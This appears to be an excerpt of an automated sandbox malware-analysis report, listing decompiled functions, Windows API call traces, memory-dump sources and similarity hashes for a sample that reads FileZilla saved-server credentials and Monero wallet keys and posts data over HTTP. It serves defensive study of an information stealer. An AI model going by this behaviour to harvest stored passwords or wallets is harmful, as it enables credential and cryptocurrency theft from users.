                                    • Opcode ID: cb90906a64383f2cd46286bc4e7bf02eb9446dc139c6f5c7afdd379110a5d5de
                                    • Instruction ID: 1d74183c9882a35417ca38da3fcd825ae82f324e3e0da42209da3193cbb7f26e
                                    • Opcode Fuzzy Hash: cb90906a64383f2cd46286bc4e7bf02eb9446dc139c6f5c7afdd379110a5d5de
                                    • Instruction Fuzzy Hash: C85144F7E046008BF3104E2ADC4476AB6DAEBD0320F2B863DDB99977C0D9384C068296
                                    Function 003FB466 Relevance: .1, Instructions: 129COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93ab0265677681bd55f7e1974e7aeee22330cd34968dfa3886de3acac02600e8
                                    • Instruction ID: da1ee42caaa02ef40dd0248ce4901614c365a8ec2db1d2adef124457fe673253
                                    • Opcode Fuzzy Hash: 93ab0265677681bd55f7e1974e7aeee22330cd34968dfa3886de3acac02600e8
                                    • Instruction Fuzzy Hash: 444135F3A082009FE304AE7CDC8572BB7D5EB94320F1A453DEAD5C3384E678A9058786
                                    Function 004791B5 Relevance: .1, Instructions: 126COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 556cb7ae805f07f06e30462c8118bcd252f2414e8de0d0623cfe37ba9886120f
                                    • Instruction ID: 00c60731f961e5b44739830ca46ba559d23b9bc2c08918e9590decad5b9ea502
                                    • Opcode Fuzzy Hash: 556cb7ae805f07f06e30462c8118bcd252f2414e8de0d0623cfe37ba9886120f
                                    • Instruction Fuzzy Hash: CE3123F39182085FD364BE79DC08767BBDADBA0260F1B892EEAC4C7784FD3455018296
                                    Function 000E9750 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 000E0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,000F0DBA,000F0DB7,000F0DB6,000F0DB3), ref: 000E0362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E0369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 000E0385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 000E03CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E03DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 000E0419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000E0463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 000E0562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 000E0571
                                    • lstrcat.KERNEL32(?,url: ), ref: 000E0580
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E0593
                                    • lstrcat.KERNEL32(?,000F1678), ref: 000E05A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E05B5
                                    • lstrcat.KERNEL32(?,000F167C), ref: 000E05C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 000E05D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E05E6
                                    • lstrcat.KERNEL32(?,000F1688), ref: 000E05F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 000E0604
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E0617
                                    • lstrcat.KERNEL32(?,000F1698), ref: 000E0626
                                    • lstrcat.KERNEL32(?,000F169C), ref: 000E0635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 128ab485a496e8bc113c176e1f011854440a619de649af20543dcfc26b6177cb
                                    • Instruction ID: d54116d806489202d5c910ff4914561ab3b9bdbad79d6a9fc4c7a73c30dfafe6
                                    • Opcode Fuzzy Hash: 128ab485a496e8bc113c176e1f011854440a619de649af20543dcfc26b6177cb
                                    • Instruction Fuzzy Hash: 8BD14271A002489FDB04EBE1DD96EEE777CAF59301F448418F202B6092DF74BA06CB62
                                    Function 000D5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                      • Part of subcall function 000D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000D59F8
                                    • StrCmpCA.SHLWAPI(?,00B81328), ref: 000D5A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D5B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00B812B8,00000000,?,00B80008,00000000,?,000F1A1C), ref: 000D5E71
                                    • lstrlen.KERNEL32(00000000), ref: 000D5E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 000D5E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D5E9A
                                    • lstrlen.KERNEL32(00000000), ref: 000D5EAF
                                    • lstrlen.KERNEL32(00000000), ref: 000D5ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000D5EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 000D5F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000D5F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000D5F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 000D5FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 000D5FBD
                                    • HttpOpenRequestA.WININET(00000000,00B812A8,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D5BF8
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • InternetCloseHandle.WININET(00000000), ref: 000D5FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: d8acc9077b55708ad05849ecc7a08abb52aab44313b5560d4330265490c18388
                                    • Instruction ID: 2ff5ae9d67cd63e0de1cdb6e7982f950d2fc02a89378755e37bdf85a2921c242
                                    • Opcode Fuzzy Hash: d8acc9077b55708ad05849ecc7a08abb52aab44313b5560d4330265490c18388
                                    • Instruction Fuzzy Hash: A5123E71A20158AEDB15EBA1DD95FEEB378BF19700F4141A9B10672093EF303A49CF65
                                    Function 000DCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DCF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000DD0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000DD0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD208
                                    • lstrcat.KERNEL32(?,000F1478), ref: 000DD217
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD22A
                                    • lstrcat.KERNEL32(?,000F147C), ref: 000DD239
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD24C
                                    • lstrcat.KERNEL32(?,000F1480), ref: 000DD25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD26E
                                    • lstrcat.KERNEL32(?,000F1484), ref: 000DD27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD290
                                    • lstrcat.KERNEL32(?,000F1488), ref: 000DD29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD2B2
                                    • lstrcat.KERNEL32(?,000F148C), ref: 000DD2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD2D4
                                    • lstrcat.KERNEL32(?,000F1490), ref: 000DD2E3
                                      • Part of subcall function 000EA820: lstrlen.KERNEL32(000D4F05,?,?,000D4F05,000F0DDE), ref: 000EA82B
                                      • Part of subcall function 000EA820: lstrcpy.KERNEL32(000F0DDE,00000000), ref: 000EA885
                                    • lstrlen.KERNEL32(?), ref: 000DD32A
                                    • lstrlen.KERNEL32(?), ref: 000DD339
                                      • Part of subcall function 000EAA70: StrCmpCA.SHLWAPI(00B79218,000DA7A7,?,000DA7A7,00B79218), ref: 000EAA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 000DD3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 9dbe5e28bfb2605d2e28e682611592360efadf3c2e1d12ee4cae6314bc049619
                                    • Instruction ID: 41ab86200eb1f2dcf5217c38df5d00acdd5118237894f2dddff86b1e2386144a
                                    • Opcode Fuzzy Hash: 9dbe5e28bfb2605d2e28e682611592360efadf3c2e1d12ee4cae6314bc049619
                                    • Instruction Fuzzy Hash: E6E13A71A10148AFDB05EBA1DD96EEE737CAF1D301F114159F106B60A2DF35BA0ACB62
                                    Function 000DC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00B7F1D8,00000000,?,000F144C,00000000,?,?), ref: 000DCA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000DCA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 000DCA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000DCAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000DCAD9
                                    • StrStrA.SHLWAPI(?,00B7F070,000F0B52), ref: 000DCAF7
                                    • StrStrA.SHLWAPI(00000000,00B7EFF8), ref: 000DCB1E
                                    • StrStrA.SHLWAPI(?,00B7FE80,00000000,?,000F1458,00000000,?,00000000,00000000,?,00B79248,00000000,?,000F1454,00000000,?), ref: 000DCCA2
                                    • StrStrA.SHLWAPI(00000000,00B7FCE0), ref: 000DCCB9
                                      • Part of subcall function 000DC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000DC871
                                      • Part of subcall function 000DC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000DC87C
                                    • StrStrA.SHLWAPI(?,00B7FCE0,00000000,?,000F145C,00000000,?,00000000,00B791A8), ref: 000DCD5A
                                    • StrStrA.SHLWAPI(00000000,00B78FA8), ref: 000DCD71
                                      • Part of subcall function 000DC820: lstrcat.KERNEL32(?,000F0B46), ref: 000DC943
                                      • Part of subcall function 000DC820: lstrcat.KERNEL32(?,000F0B47), ref: 000DC957
                                      • Part of subcall function 000DC820: lstrcat.KERNEL32(?,000F0B4E), ref: 000DC978
                                    • lstrlen.KERNEL32(00000000), ref: 000DCE44
                                    • CloseHandle.KERNEL32(00000000), ref: 000DCE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 22333f0ec66a6e215c883da5c7f35933f370f0a4d4680a5018eee32f10cb35ee
                                    • Instruction ID: 375f72a5b5d84c581feea53e0c4099391070211b6ff3db8aaabf36934399ad15
                                    • Opcode Fuzzy Hash: 22333f0ec66a6e215c883da5c7f35933f370f0a4d4680a5018eee32f10cb35ee
                                    • Instruction Fuzzy Hash: 74E10B71A00148AFDB15EBA1DD92FEEB779AF19300F014169F10676193EF307A4ACB66
                                    Function 000E8320 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • RegOpenKeyExA.ADVAPI32(00000000,00B7C128,00000000,00020019,00000000,000F05B6), ref: 000E83A4
